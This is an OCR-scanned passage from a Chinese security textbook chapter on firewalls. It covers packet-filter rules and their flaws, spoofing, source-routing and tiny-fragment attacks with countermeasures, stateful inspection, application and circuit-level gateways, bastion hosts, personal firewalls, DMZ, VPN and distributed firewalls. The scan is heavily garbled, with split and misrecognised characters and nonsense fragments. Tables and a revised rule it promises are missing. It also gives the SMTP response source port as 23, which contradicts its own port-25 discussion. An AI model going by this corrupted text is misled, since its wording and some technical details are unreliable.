义 是 : 

1. 允许 从 外 部 源 人 站 的 电子 邮件 流量 (SMTP 的 端口 是 25 )。 

2. 该 规则 试图 允许 对 入 站 的 SMTP 连接 进行 响应 。 


表 9-1 包 过 滤 的 例子 
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3. 允许 向 外 部 源 出 站 的 电子 邮件 流量 。 

4. 该 规则 试图 允许 对 出 站 的 SMTP 连接 进行 响应 。 

5. 这 是 默认 规则 的 明确 说 明 。 所 有 规则 集 的 最 后 都 必然 会 存在 这 样 一 条 规则 。 

这 个 规则 集 存在 几 个 问题 。 规 则 4 允许 任何 目标 端口 号 大 于 1023 的 外 部 流量 进入 。 我 们 
考虑 利用 此 规则 进行 攻击 的 一 个 例子 ， 即 外 部 攻击 者 可 以 建立 一 个 从 攻击 者 5150 端口 到 内 部 
Web 代理 服务 器 8080 端口 的 连接 。 按 理 说， 该 行为 应 该 是 被 禁止 的 ， 它 可 能 导致 服务 器 被 攻 
击 。 为 了 应 对 这 种 问题 ， 防 火 墙 规则 集 的 每 一 行 应 该 添加 一 个 源 端口 列 。 对 于 规则 2 和 规则 4 
来 说 ， 源 端口 号 应 该 被 设 定 为 23; 对 于 规则 1 和 规则 3 来 说 ， 源 端口 号 应 该 被 设 定 为 大 于 1023。 

但 是 有 一 个 漏洞 仍然 存在 。 规 则 3 和 规则 4 的 意图 是 任何 内 部 主机 都 可 以 对 外 发 送 邮件 。 
任 一 目的 端口 为 25 的 TCP 包 都 将 被 路 由 到 对 方 的 SMTP 服务 器 。 这 种 规则 的 问题 在 于 SMTP 
的 接收 端口 号 为 25 仅仅 是 默认 设置 ， 外 部 的 主机 很 可 能 还 在 25 端口 上 配置 了 其 他 应 用 。 如 果 
应 用 修改 后 的 规则 4， 攻 击 者 很 可 能 通过 发 送 一 个 源 端口 为 25 的 TCP 包 ， 得 到 内 部 机 器 的 访 
问 权 限 。 为 了 应 对 这 种 威胁 ， 我 们 可 以 在 规则 的 每 一 行 加 入 ACK 标记 列 。 对 规则 4 而 言 ， 该 
列表 明 从 外 部 进入 的 数据 包 必 须 设 有 ACK 标记 。 现 在 的 规则 4 应 该 像 下 面 这 样 : 


该 规则 利用 了 TCP 连接 的 特性 。 一 旦 连接 建立 ， 来自 其 他 地 方 的 TCP 包 的 ACK 标记 会 
被 设 定 为 应 答 。 这 样 ， 该 规则 允许 TCP 字段 中 设 有 ACK 标记 且 源 端口 号 为 25 的 数据 包 进 入 。 
包 过 滤 防 火 墙 的 一 个 优点 是 简单 。 而 且 ， 通常 包 过 滤 对 用 户 是 透明 的 ， 而 且 具 有 很 快 的 处 

理 速 度 。[SCAR09b] 列 出 了 包 过 滤 防 火 墙 的 如 下 弱点 : 

e 因为 包 过 滤 防 火 墙 不 检查 更 高 层 ( high-layer) 的 数据 ， 因 此 这 种 防火 墙 不 能 阻止 利用 

了 特定 应 用 的 漏洞 或 功能 所 进行 的 攻击 。 例 如 ， 包 过 滤 防 火 墙 不 能 阻止 特定 的 应 用 命 

令 ; 如 果 包 过 滤 防 火 墙 允许 某 些 应 用 程序 通过 防火 墙 ， 那 么 就 允许 该 应 用 程序 中 所 有 

可 用 的 功能 。 

防火 墙 可 利用 的 信息 有 限 ， 使 得 包 过 滤 防 火 墙 的 日 志 记 录 功 能 也 有 限 。 包 过 滤 记 录 通 

常 包含 用 于 访问 控制 决策 的 相同 信息 ( 源 地 址 、 目 的 地 址 ， 以 及 通信 类 型 )。 

© 大 多 数 包 过 滤 防 火 墙 不 支持 高 级 的 用 户 认 证 机 制 。 这 种 限制 同样 是 由 于 防火 墙 对 更 高 
层 应 用 缺乏 支持 而 造成 的 。 

o 包 过 滤 防 火 墙 对 利用 TCP/IP 规范 和 协议 栈 存在 的 问题 进行 的 攻击 没有 很 好 的 应 对 措 
施 ， 比 如 网 络 层 地 址 欺骗 攻击 。 包 过 滤 防 火 墙 不 能 检测 出 包 的 OSI 第 三 层 地 址 信息 的 
改变 ， 入 侵 者 通常 采用 地 址 欺骗 攻击 来 绕 过 防火 墙 平台 的 安全 控制 机 制 。 

e 最 后 ， 由 于 包 过 滤 防 火 墙根 据 几 个 变量 进行 访问 控制 决策 ， 因 此 不 恰当 的 设置 会 引起 
包 过 滤 防 火 墙 的 安全 性 受到 威胁 。 换 句 话 说 ， 在 配置 防火 墙 时 ， 容 易 在 不 经 意 间 违反 
机 构 内 部 的 消息 安全 策略 ， 将 一 些 本 该 拒绝 的 流量 类 型 、 源 地 址 和 目的 地 址 配置 在 允 
许 访 问 的 范围 内 。 

下 面 是 针对 包 过 滤 防 火 墙 的 攻击 方式 ， 以 及 合适 的 应 对 措施 : 

e IP 地 址 欺骗 攻击 (IP address spoofing): 入 侵 者 从 外 部 向 内 传送 数据 包 ， 使 用 的 源 IP 地 
址 域 包含 内 部 主机 地 址 。 攻 击 者 希望 通过 这 样 的 假冒 内 部 可 信和 主机 地 址 的 包 来 渗透 防 
火 墙 系统 。 应 对 措施 是 ， 丢 弃 那 些 到 达 外 部 接口 而 源 地 址 标记 为 内 部 主机 地 址 的 包 。 
实际 上 ， 这 种 应 对 措施 经 常 运用 在 防火 墙 之 外 的 路 由 器 上 。 
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© 源 路 由 攻击 ( source routing attack): 源 端 指定 包 通 过 Internet 使 用 的 路 由 ， 和 希望 可 以 绕 
过 对 源 路 由 信息 的 安全 检查 。 应 对 措施 是 丢弃 所 有 使 用 了 此 选项 的 包 。 

e 细小 分 段 攻击 (tiny fragment attack): 人 侵 者 利用 IP 分 段 选项 来 产生 特别 小 的 数据 分 段 ， 
并 强制 将 TCP 头 信息 装 人 分 散 的 分 段 中 。 设 计 这 个 攻击 主要 是 为 了 绕 过 基于 TCP 头 信 
息 的 过 滤 规 则 。 通 常 ， 包 过 滤器 将 确定 是 否 过 滤 包 的 第 一 个 分 段 。 在 第 一 个 分 段 被 否 
决 的 基础 上 ， 再 单独 过 滤 包 的 所 有 其 他 分 段 。 攻 击 者 希望 过 滤 防 火 墙 只 检查 第 一 个 分 
段 而 允许 其 他 分 段 通过 。 应 对 细小 分 段 攻击 的 措施 是 执行 以 下 规则 : 包 的 第 一 个 分 段 
必须 包含 最 少 的 预定 传输 头 。 如 果 第 一 个 分 段 被 否决 ， 过 滤器 将 记 住 这 个 包 ， 并 丢弃 
后 继 的 所 有 分 段 。 


9.3.2 ”状态 检测 防火 墙 


传统 的 包 过 滤器 仅仅 对 单个 数据 包 执 行 过 滤 判 断 ， 而 不 考虑 更 高 层 的 上 下 文 信息 。 要 理 
解 上 下 文 信息 的 意义 以 及 为 什么 传统 包 过 滤器 受 限 于 对 上 下 文 信息 的 考虑 ， 需 要 一 点 背景 知 
识 。 大 多 数 在 TCP 顶部 运行 的 应 用 程序 都 遵循 客户 端 /服务 器 模式 。 例 如 ， 对 于 简单 邮件 传 
输 协 议 (SMTP)， 电 子 邮件 从 客户 端 系统 传送 到 服务 器 系统 。 客 户 端 系统 产生 了 新 的 电子 邮件 
消息 ， 典 型 的 情况 是 来 自 于 用 户 的 输入 。 服 务 器 系统 接收 到 电子 邮件 消息 ， 把 它 放 到 合适 的 用 
户 邮 箱 。SMTP 在 客户 端 和 服务 器 之 间 建 立 一 条 TCP 连接， 其 中 TCP 服务 器 的 端口 号 是 25， 
该 端口 和 SMTP 服务 器 的 应 用 程序 相对 应 。SMTP 客户 端的 TCP 端口 号 由 SMTP 客户 端 生成 ， 
其 是 一 个 在 1024 到 65 535 之 间 的 数 。 

通常 情况 下 ， 当 一 个 应 用 程序 使 用 TCP 创建 一 个 到 远程 主机 的 会 话 时 ， 需 要 建立 一 条 
客户 端 与 服务 器 端 之 间 的 TCP 连接， 其 中 远程 (服务器) 应 用 程序 的 TC 端口 号 是 一 个 小 于 
1024 的 数 ， 本 地 (客户 端 ) 应 用 程序 的 TCP 端口 号 是 一 个 介 于 1024 到 65 535 之 间 的 数 。 小 
于 1024 的 编号 都 是 “周知 ”端口 号 ， 被 永久 性 地 分 配给 特定 的 应 用 程序 (例如 ，25 是 SMTP 
服务 器 )。 介 于 1024 到 65 535 之 间 的 编号 是 动态 产生 的 ， 只 具有 在 一 次 TCP 连接 期 间 的 临时 
含义 。 

、 一 个 简单 的 包 过 滤 防 火 墙 必须 允许 所 有 高 端口 上 的 基于 TCP 的 人 站 网 络 流量 。 这 就 产生 
了 可 以 被 非法 用 户 利 用 的 漏洞 。 

状态 检测 防火 墙 通过 建立 一 个 出 站 (outbound)TCP 连接 目录 来 强制 执行 TCP 流量 的 规则 ， 
如 表 9-2 所 示 。 当 前 每 个 已 建立 的 连接 都 有 一 项 与 之 对 应 。 这 样 ， 只 有 当 数 据 包 符合 这 个 目录 
中 的 某 项 时 ， 包 过 滤器 才 允 许 那些 到 达 高 端口 号 的 人 站 流量 通过 。 


表 9-2 ”状态 防火 墙 连 接 状 态 示例 


men ET 
well w | 


223.21.22.12 已 建立 


222. P-R 计算 机 交会 扩大 与 原理 


状态 检测 防火 墙 和 包 过 滤 防 火 墙 检查 相同 的 包 信息 ， 但 是 不 同 的 是 状态 检测 防火 墙 还 会 记 
录 TCP 连接 信息 (图 9-1c)。 一些 状态 检测 防火 墙 还 跟踪 TCP 包 的 序号 ， 以 阻止 基于 序号 的 攻 
击 ， 例 如 会 话 劫持 攻击 。 为 了 识别 和 跟踪 相关 的 连接 ， 一 些 状 态 检 测 防 火 墙 甚至 限制 了 一 些 众 
所 周知 的 协议 如 FTP、IM 和 SIPS 命令 等 的 应 用 数据 量 。 


9.3.3 ”应 用 级 网 关 


应 用 级 网 关 也 称 为 应 用 代理 (application proxy)， 起 到 应 用 级 流量 中 继 器 的 作用 
(图 9-1d)。 用 户 使 用 TCP/IP 应 用 程序 (比如 Telnet 或 FTP) 连接 到 网 关 ， 同 时 网 关 要 求 用 户 
提供 要 访问 的 远程 主机 名 。 当 用 户 应 答 并 提供 了 一 个 有 效 的 用 户 ID 和 认证 信息 时 ， 网 关 会 联 
系 远程 主机 并 在 两 个 端点 之 间 中 继 包 含 应 用 程序 数据 的 TCP 分 段 。 如 果 网 关 不 包含 某 种 服务 
的 代理 实现 机 制 ， 该 服务 将 不 会 得 到 网 关 的 支持 ， 并 且 对 服务 器 的 请 求 不 能 通过 防火 墙 。 进 一 
步 ， 网 关 可 以 被 设置 为 只 支持 应 用 程序 中 网 络 管理 者 认为 可 接受 的 那 部 分 特性 ， 而 且 拒绝 所 有 
其 他 的 特性 。 

应 用 级 网 关 往 往 比 包 过 滤器 更 安全 。 应 用 级 网 关 并 不 需要 判断 大 量 的 TCP A IP EE 
接 是 否 被 允许 通过 ， 而 只 需要 细 查 少数 可 以 允许 的 应 用 程序 。 另 外 ， 在 应 用 层 上 很 容易 记录 和 
审计 所 有 的 人 站 流量 。 

应 用 级 网 关 的 最 大 缺点 是 带 来 了 对 每 条 连接 的 额外 处 理 开 销 。 实 际 上 ， 在 两 个 终端 用 户 之 
间 有 两 条 接合 连接 ， 网 关 处 在 接合 点 上 ， 网 关 必 须 对 所 有 双向 的 流量 进行 检查 和 传送 。 


9.3.4 电路 级 网 关 


防火 墙 的 第 4 种 类 型 是 电路 级 网 关 ， 也 称 为 电路 级 代理 〈circuit-level proxy) (图 9-le)。 它 
可 能 是 单机 系统 或 者 是 应 用 级 网 关 为 特定 应 用 程序 执行 的 专门 功能 。 与 应 用 级 网 关 相 似 ， 电 
路 级 网 关 不 允许 端 到 端 (end-to-end) TCP 连接 ;而 是 建立 两 条 TCP 连接 ， 一 条 在 自身 和 内 部 
主机 TCP 用 户 之 间 ， 另 一 条 在 自身 和 外 部 主机 TCP 用 户 之 间 。 通 常 ， 一 旦 建立 了 这 两 条 连 
接 ， 网 关 就 在 这 两 条 连接 之 间 中 继 TCP 分 段 ， 不 检查 其 内 容 。 安 全 功能 包括 判断 哪些 连接 是 
允许 的 。 
电路 级 网 关 的 一 个 典型 的 应 用 是 系统 管理 员 信任 系统 内 部 用 户 的 情况 。 此 时 ， 电 路 级 网 关 
可 以 被 设置 为 支持 两 种 连接 ， 一 种 是 应 用 级 服务 或 代理 服务 的 人 站 连接 ， 另 一 种 是 电路 级 功能 
的 出 站 连接 。 在 这 样 的 设置 下 ， 电 路 级 网 关 在 检查 人 站 应 用 数据 是 否 有 禁止 的 功能 时 增加 了 一 
些 额 外 的 开销 ， 对 于 出 站 的 数据 不 会 有 这 种 开销 。 
电路 级 网 关 实 现 的 一 个 例子 是 SOCKS 包 [KOBL92] ;在 RFC 1928 中 定义 了 SOCKS 的 第 
5 i. RFC 使 用 如 下 方式 定义 SOCKS: 
这 一 协议 定义 的 目的 是 提供 一 个 同时 支持 TCP 协议 和 UDP 协议 的 客户 - 服务 器 应 用 框 
w, 为 了 实现 方便 和 安全 地 使 用 网 络 防 火 墙 服务 。 这 个 协议 是 应 用 层 和 传输 层 之 间 的 概念 上 的 
“中 介 层 ”(shim-layer)， 其 不 提供 网 络 层 网 关 的 服务 ， 比 如 转发 ICMP 消息 。 
SOCKS 包含 下 列 组 件 : 
e SOCKS 服务 器 ， 在 基于 UNIX 的 防火 墙 上 运行 。SOCKS 也 可 以 在 Windows 系统 上 
实现 。 
© SOCKS 客户 库 ， 在 受 防火 墙 保护 的 内 部 主机 上 运行 。 
e 一 些 标准 的 客户 端 程序 (比如 FTP 和 TELNET) 的 SOCKS 修订 版 。SOCKS 协议 的 实 
现 一 般 包 含 基于 TCP 的 客户 端 应 用 程序 的 重新 编译 或 者 重新 连接 ， 或 者 可 供 选 择 的 动 
态 加 载 的 库 ， 使 得 这 些 函 数 可 以 使 用 SOCKS 库 中 的 封装 例 程 。 
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当 基 于 TCP 的 客户 端 试 图 与 只 有 通过 防火 墙 才能 到 达 的 客体 建立 连接 时 (这 种 判断 留待 
执行 时 进行 )， 它 必须 与 SOCKS 服务 器 系统 的 相应 SOCKS 端口 建立 TCP 连接 。SOCKS 服 
务 位 于 TCP 的 1080 端口 。 如 果 连 接 请 求 成 功 了 ， 客 户 端 与 服务 器 继续 就 使 用 的 认证 方法 进 
行 协商 ， 然 后 用 选 定 的 方法 进行 认证 ， 认 证 通过 之 后 发 送 中 继 请 求 。SOCKS 服务 器 评估 这 个 
请 求 后 ， 建 立 合 适 的 连接 或 者 禁止 它 。UDP 交换 也 可 以 用 类 似 的 形式 处 理 。 事 实 上 ， 对 用 户 
发 送 和 接收 的 UDP 分 段 进行 认证 要 打开 一 个 TCP 连接 ， 只 要 TCP 连接 打开 ， 即 可 转发 UDP 
分 段 。 


94 防火 墙 的 布置 


通常 ， 将 防火 墙 布置 在 运行 普通 操作 系统 〈 例 如 ，UNIX 或 者 Linux 系统 ) 的 独立 机 器 上 。 
防火 墙 功能 也 能 够 以 软件 模块 的 形式 布置 在 路 由 器 或 LAN 交换 机 上 。 本 节 ， 我 们 将 考虑 防火 
墙 的 一 些 其 他 布置 方式 。 


9.4.1 堡垒 主机 


堡垒 主机 被 防火 墙 管理 员 称 为 网 络 安全 中 极 强 的 端 系统 。 通 常 ， 堡 人 又 主机 可 以 作为 应 用 级 

或 电路 级 网 关 平 台 。 保 仅 主 机 的 共同 特征 如 下 : 

e 保 难 主机 的 硬件 平台 上 运行 操作 系统 的 安全 版 本 ,使 其 成 为 可 信 系统 。 
© 只 有 那些 被 网 络 管理 员 认为 是 基本 的 服务 才 可 以 安装 在 堡垒 主机 上 。 基 本 服务 主要 包 

括 代理 应 用 程序 ， 比 如 DNS, FTP, HTTP 和 SMTP. 

在 用 户 被 允许 访问 代理 服务 之 前 ， 堡 垒 主机 可 能 需要 对 其 进行 附加 认证 。 另 外 ， 在 授 

予 用 户 访问 权限 之 前 ， 各 个 代理 服务 可 能 需要 各 自 的 认证 。 

e 每 个 代理 被 配置 为 只 支持 标准 应 用 命令 集 的 子 集 。 

© 每 个 代理 被 配置 为 只 允许 对 指定 系统 进行 访问 。 这 意味 着 有 限 的 命令 / 特征 集 只 应 用 

于 受 保护 网 络 的 部 分 系统 。 

每 个 代理 通过 记录 所 有 网 络 流 量 、 每 条 连接 以 及 每 条 连接 的 持续 时 间 来 维护 详细 的 审 

计 信 息 。 审 计 记 录 是 发 现 和 终止 人 侵 攻击 的 基本 工具 。 

每 个 代理 模块 是 专门 为 网 络 安全 设计 的 非常 小 的 软件 包 。 由 于 它 相 对 简单 ， 检 查 这 样 

的 模块 的 安全 缺陷 比较 容易 。 例 如 ， 一 个 典型 的 UNIX 邮件 应 用 程序 可 能 包含 超过 

20 000 行 代码 ， 而 一 个 邮件 代理 可 能 包含 不 超过 1000 行 的 代码 。 

© 在 堡垒 主机 中 每 一 个 代理 都 独立 于 其 他 的 代理 。 如 果 某 个 代理 的 运行 有 问题 ， 或 发 现 
了 一 个 未 知 的 漏洞 ， 可 以 御 载 这 个 代理 ， 而 不 影响 其 他 代理 应 用 程序 的 运行 。 而 且 ， 
如 果 用 户 群 需要 一 个 新 服务 的 支持 ， 网 络 管理 员 可 以 容易 地 在 堡垒 主机 上 安装 需要 的 
代理 。 

e 除了 读 自 己 的 初始 配置 文件 以 外 ， 代 理 通常 不 进行 磁盘 读 取 操作 。 因 此 ， 在 文件 系统 
中 那些 包含 可 执行 代码 的 部 分 被 设置 成 只 读 。 这 使 得 人 侵 者 难以 在 堡垒 主机 上 安装 特 
洛 伊 木马 、 嗅 探 器 或 其 他 危险 文件 。 

e 每 个 代理 在 堡垒 主机 上 有 其 专用 而 且 安 全 的 目录 ， 并 以 一 个 无 特权 的 用 户 身份 运行 。 


9.4.2 ”基于 主机 的 防火 墙 


基于 主机 的 防火 墙 是 一 个 用 于 保障 个 人 主机 安全 的 软件 模块 。 这 个 模块 在 许多 操作 系统 中 
是 自 带 的 ， 或 者 以 附件 的 形式 提供 。 像 传统 的 单机 防火 墙 一 样 ， 主 机 驻 留 〈host-resident) 防火 
墙 能 够 过 滤 和 限制 数据 包 流 。 通 常 ， 这 样 的 防火 墙 位 于 服务 器 上 。 这 种 基于 服务 器 或 基于 工作 
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站 的 防火 墙 有 以 下 优点 : 


© 过 滤 规 则 可 以 根据 主机 环境 定制 ， 既 能 够 执行 服务 器 共有 的 安全 策略 ， 也 能 够 针对 不 


同 的 应 用 使 用 不 同 的 过 滤 规 则 。 
© 保护 功能 独立 于 网 络 的 拓扑 结构 。 因 此 ， 不 管 是 内 部 的 攻击 还 是 外 部 的 攻击 都 必须 通 
过 防火 墙 。 


。 应 用 于 单机 防火 墙 之 间 的 联合 处 ， 基 于 主机 的 防火 墙 提供 了 一 个 额外 的 保护 层 。 当 在 
网 络 中 添加 新 服务 器 时 ， 只 需 配置 服务 器 自 带 的 防火 墙 ， 而 不 需 修 改 整个 网 络 的 防火 
墙 设置 。 


9.4.3 个 人 防火 墙 


个 人 防火 墙 控制 个 人 电脑 或 者 工作 站 与 Internet 或 企业 网 络 之 间 的 网 络 流 量 。 个 人 防火 墙 
的 功能 可 以 用 于 家 庭 环境 或 公司 的 内 网 中 。 通 常 ， 个 人 防火 墙 是 个 人 电脑 上 的 一 个 软件 模块 。 
在 一 个 有 多 台 计 算 机 连接 到 Internet 的 家 庭 环 境 中 ， 防 火 墙 功能 也 可 以 集成 到 连接 着 所 有 家 用 
电脑 和 DSL、 电 缆 调 制 解 调 器 (cable modem) 或 其 他 Internet 接 人 设备 的 路 由 器 上 。 . 

通常 的 个 人 防火 墙 要 比 基 于 服务 器 的 防火 墙 或 单机 防火 墙 简单 得 多 。 个 人 防火 墙 的 首要 功 
能 是 拒绝 对 本 机 的 非法 远程 访问 。 防 火 墙 也 能 够 通过 监控 出 站 活动 ， 来 试图 检测 和 阻 断 蠕虫 和 
其 他 的 恶意 软件 的 行为 。 

个 人 防火 墙 的 功能 在 Linux 系统 下 由 netfilter GREH, Æ BSD Fil Mac OS X 系统 下 则 是 
pf 包 。 这 些 软 件 包 可 以 在 命令 行 或 者 图 形 界面 上 进行 配置 。 一 旦 这 样 的 个 人 防火 墙 被 启用 ， 所 
有 的 人 站 连接 通常 都 会 被 阻止 ， 除 非 该 连接 得 到 了 用 户 明确 的 许可 。 而 出 站 连接 通常 都 会 被 允 
许 。 入 站 服务 可 以 有 选择 地 根据 端口 号 被 重新 启用 ， 其 中 包括 如 下 内 容 : 

© 个 人 文件 共享 (548, 427) 
窗口 共享 ( 139 ) 

个 人 网 站 共享 (80，427 ) 

远程 登录 一 SHH (22) 

FTP 访问 (20 ~ 21, 20 ~ 21 端口 的 连接 转 到 1024 ~ 64535 端口 ) 
打印 机 共享 (631，515 ) 

IChat Rendezvous ( 5297，5298 ) 

iTunes 音乐 共享 (3869 ) 

CVS (2401 ) 

Gnutella/Limewire ( 6346 ) 

ICQ (4000 ) 

IRC (194) 

MSN Messenger ( 6891-6900 ) 

网 络 时 间 ( 123 ) 

Retrospect ( 497 ) 

SMB (无 网 络 输入 输出 系统 without netbios-445 ) 
VNC ( 5900-5902 ) 

e WebSTAR Admin ( 1080，1443 ) 

4 FTP 访问 服务 启用 ， 本 机 的 20 和 21 端口 就 对 FTP 连接 开放 ; 如 果 有 其 他 连接 从 20 或 
21 端口 连接 到 该 计算 机 ， 则 本 计算 机 上 从 1024 到 64535 的 端口 也 打开 。 

为 了 加 强 保 护 ， 用 户 也 可 以 配置 防火 墙 的 高 级 特性 。 例 如 隐形 模式 〈Stealth mode) 通过 
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丢弃 那些 未 被 请 求 的 通信 和 包 来 隐藏 系统 ， 使 之 看 起 来 好 像 并 不 存在 。UDP 数据 包 能 够 被 阻止 ， 
限制 网 络 流量 ， 只 允许 开放 端口 的 TCP 数据 包 通 过 。 防 火 墙 也 支持 日 志 功 能 ， 日 志 功 能 是 检 
查 非 期 望 活动 的 重要 工具 。 其 他 类 型 的 个 人 防火 墙 允 许 用 户 指明 特定 的 应 用 ， 或 者 带 有 授权 认 
证 的 应 用 ,来 提供 基于 网 络 访问 的 服务 。 


9.5 ”防火墙 的 部 署 和 配置 


如 图 9-1a 所 示 ， 防 火 墙 在 内 部 网 络 与 具有 潜在 不 可 信 流 量 源 的 外 部 网 络 之 间 建 立 了 防护 
屏障 。 在 牢记 防火 墙 的 一 - 般 原则 的 同时 ， 安 全 管理 员 还 必须 决定 防火 墙 的 部 署 和 所 需要 的 数 
量 。 在 这 一 节 ， 我 们 将 讨论 一 些 通常 的 有 关 防 火 墙 部 署 的 选择 。 

9.5.1 DMZ 网 络 

图 9-2 展示 了 内 部 和 外 部 防火 墙 之 间 最 常见 的 配置 (在 图 8-5 中 也 能 看 到 )。 外 部 防火 墙 
被 设置 在 局 域 网 或 者 企业 网 络 的 边缘 ， 紧 接 在 连接 Internet 或 者 某 个 广域网 (WAN) 的 边界 路 
由 的 内 侧 。 一 个 或 更 多 内 部 防火 墙 则 负责 保护 企业 内 部 网 。 在 这 两 种 防火 墙 之 间 是 由 一 个 或 更 
多 设备 联网 形成 的 称 为 “ 非 军事 区 ” (demilitarized zone) 的 网 络 区 域 。 那 些 可 以 从 外 部 访问 但 
是 需要 一 定 保护 措施 的 系统 通常 被 设置 在 DMZ 网 络 中 。 一 般 来 说 ，DMZ 中 的 系统 需要 或 者 
本 身 具 有 外 部 连通 性 ， 比 如 一 个 企业 Web 站 点 、 一 个 邮件 服务 器 ， 或 者 一 个 DNS (域名 系统 ) 
服务 器 。 

外 部 防火 墙 为 DMZ 系统 提供 符合 其 需要 并 同时 保证 其 外 部 连通 性 的 访问 控制 和 保护 措 
施 。 外 部 防火 墙 同 时 也 为 内 部 网 的 其 他 部 分 提供 基本 的 安全 保护 。 在 这 种 布局 中 ， 内 部 防火 墙 
有 如 下 三 个 服务 目的 : 

1. 与 外 部 防火 墙 相 比 ， 内 部 防火 墙 增加 了 更 严格 的 过 滤 能 力 ， 以 保护 内 部 网 络 服务 器 和 工 
作 站 免 遭 外 部 攻击 。 

2. 对 于 DMZ 网 络 ， 内 部 防火 墙 提供 双重 的 保护 功能 。 首 先 ， 内 部 防火 墙 保护 网 络 的 其 他 
部 分 免 受 由 DMZ 网 络 发 起 的 攻击 ， 这 样 的 攻击 可 能 来 源 于 蠕虫 ( worm), rootkit, bot 或 者 其 
他 寄宿 在 DMZ 系统 中 的 恶意 软件 。 其 次 ， 内 部 防火 墙 可 以 保护 DMZ 系统 不 受 来 自 内 部 保护 
网 络 的 攻击 。 

3. 多 重 内 部 防火 墙 可 以 用 来 分 别 保护 内 部 网 的 每 个 部 分 不 受 其 他 部 分 的 攻击 ， 图 8-5 展示 
了 这 样 一 个 网 络 布局 ， 在 这 个 网 络 中 内 部 服务 器 可 以 免 受 来 自 内 部 工作 站 的 攻击 ; 反 过 来 ， 内 
部 工作 站 也 可 以 免 受 来 自 内 部 服务 器 的 攻击 。 该 图 也 说 明了 将 DMZ 设置 在 外 部 防火 墙 的 不 同 
网 络 接口 处 并 以 此 来 访问 内 部 网 络 的 通常 的 实现 方法 。 


95.2 虚拟 专用 网 络 


在 今天 的 分 布 式 计算 环境 下 ， 虚 拟 专用 网 络 (VPN) 为 网 络 管理 提供 了 一 个 非常 具有 吸引 
力 的 解决 方案 。 本 质 上 讲 ， 一 个 VPN 是 这 样 的 一 组 计算 机 : 它们 依靠 一 个 相对 不 安全 的 网 络 
相互 连接 ， 并 利用 加 密 技术 和 特殊 的 协议 来 提供 安全 性 。 每 个 公司 网 站 、 工 作 站 、 服 务 器 和 
数据 库 都 由 一 个 或 更 多 局 域 网 连接 。 节 点 相互 连接 可 以 用 Internet 或 者 某 些 其 他 公共 网 络 来 实 
现 ， 以 节省 使 用 专用 网 的 费用 ， 同 时 将 管理 广域网 的 任务 转移 给 公共 网 提供 者 。 使 用 公共 网 络 
为 远程 工作 者 和 其 他 移动 职员 提供 了 一 个 从 远程 节点 登录 公司 系统 的 访问 途径 。 

但 是 管理 者 面临 着 一 个 基本 的 需求 ， 那 就 是 安全 。 公 共 网 络 的 使 用 将 公司 的 通信 暴露 在 
可 能 被 窃听 的 环境 下 ， 并 且 为 非法 用 户 提供 了 一 个 接 人 点 。 为 了 解决 这 个 问题 ， 就 需要 一 个 
VPN。 事 实 上 ，VPN 在 底层 协议 上 使 用 加 密 技术 和 身份 验证 ， 通 过 不 安全 的 网 络 环境 (典型 的 
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如 Internet) 建立 了 一 个 安全 的 连接 。VPN 网 络 比 真正 使 用 专用 线路 的 专用 网 更 便宜 ， 但 是 依 
赖 于 信道 两 端 使 用 相同 的 加 密 和 身份 验证 技术 来 实现 。 加 密 技术 可 能 是 由 防火 墙 软件 或 者 路 由 
器 来 提供 的 。 为 了 达到 这 个 目的 ， 最 常见 的 协议 机 制 是 在 IP 层 ， 即 众所周知 的 IPSec 协议 。 









Web 邮件 DNS 
服务 器 ”服务 器 ”服务 器 


图 9-2 防火墙 配置 实例 


图 9-3 是 一 个 典型 的 IPsec 安全 协议 的 使 用 示例 8。 一 个 机 构 要 维护 多 个 位 置 分 散 的 局 域 

网 。 非 安全 他 流 在 各 个 局 域 网 中 流动 。 对 于 流出 站 点 的 流量 ， 就 需要 穿 过 某 种 专用 或 者 公共 

的 广域网 ， 这 时 就 需要 IPSec 安全 协议 了 。 这 些 协议 在 网 络 设备 中 工作 ， 比 如 负责 把 局 域 网 连 

向 外 网 的 路 由 器 或 者 防火 墙 。IPSec 的 网 络 设备 会 加 密 和 压缩 所 有 发 送 到 广域网 的 数据 ， 并 且 

解密 、 解 压缩 从 广域网 传人 的 数据 ， 也 可 能 提供 认证 功能 。 这 些 功能 对 局 域 网 上 的 工作 站 和 服 

务 器 是 透明 的 。 安 全 的 传输 对 于 通过 拨号 接 人 广域网 的 个 人 用 户 也 是 可 能 的 。 这 样 的 用 户 工作 

站 必须 通过 实现 IPSec 协议 来 提供 安全 。 它 们 也 必须 实现 高 级 别 的 主机 安全 ， 就 好 像 它们 直接 
连接 到 Internet 上 一 样 。 这 使 它们 成 为 试图 进入 公司 网 络 的 人 侵 者 的 很 有 吸引 力 的 目标 。 

实现 IPsec 的 逻辑 方法 是 将 其 设置 在 防火 墙 中 ， 如 图 9-3 中 所 示 。 如 果 IPSec 在 防火 墙 之 

后 (里 面 ) 使 用 ,那么 VPN 数据 流 在 双向 通过 防火 墙 时 都 是 被 加 密 的 。 这 种 情况 下 ， 防 火 墙 

3)8| 就 不 能 展示 出 它 的 过 滤 功 能 或 其 他 安全 功能 ， 比 如 访问 控制 、 日 志 记录 或 者 病毒 扫描 。IPSec 

319| 可 以 在 防火 墙 之 外 的 边界 路 由 器 中 使 用 。 然 而 ， 这 个 设备 似乎 比 防火 墙 更 不 安全 ， 而 且 更 让 人 


O IPSec 的 详细 内 容 可 参见 第 22 章 。 在 这 一 部 分 的 讨论 中 ,我 们 需要 了 解 的 是 IPSec 在 人 P 包 上 增加 了 一 个 或 
多 个 头 ， 用 以 支持 加 密 和 认证 功能 。 
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难以 对 IPSec 平台 产生 兴趣 。 
具有 IPSec 安全 IP 包 





明文 IP 包 


图 9-3 一 个 VPN 安全 系统 场景 


9.5.3 ”分 布 式 防 火 墙 


分 布 式 防火 墙 配置 涉及 在 一 个 中 心 管理 员 控制 下 协同 工作 的 独立 防火 墙 设备 和 基于 主机 的 
防火 墙 。 图 9-4 是 一 个 分 布 式 防火 墙 配置 的 示例 。 管 理 员 可 以 在 数 百 个 服务 器 和 工作 站 上 配置 
驻 留 主机 的 防火 墙 ， 同 时 在 本 地 和 远程 用 户 系统 上 配置 个 人 防火 墙 。 许 多 工具 人 允许 网 络 管理 员 
穿 过 整个 网 络 设 定安 全 策略 和 监视 网 络 的 安全 。 这 些 防 火 墙 提供 针对 内 部 攻击 的 保护 ， 也 人 允许 
为 特定 的 机 器 和 应 用 程序 提供 特别 定制 的 保护 。 独 立 的 防火 墙 提供 全 局 性 的 保护 ， 包 括 内 部 防 
火 墙 和 外 部 防火 墙 ， 如 同 之 前 所 讨论 的 那样 。 

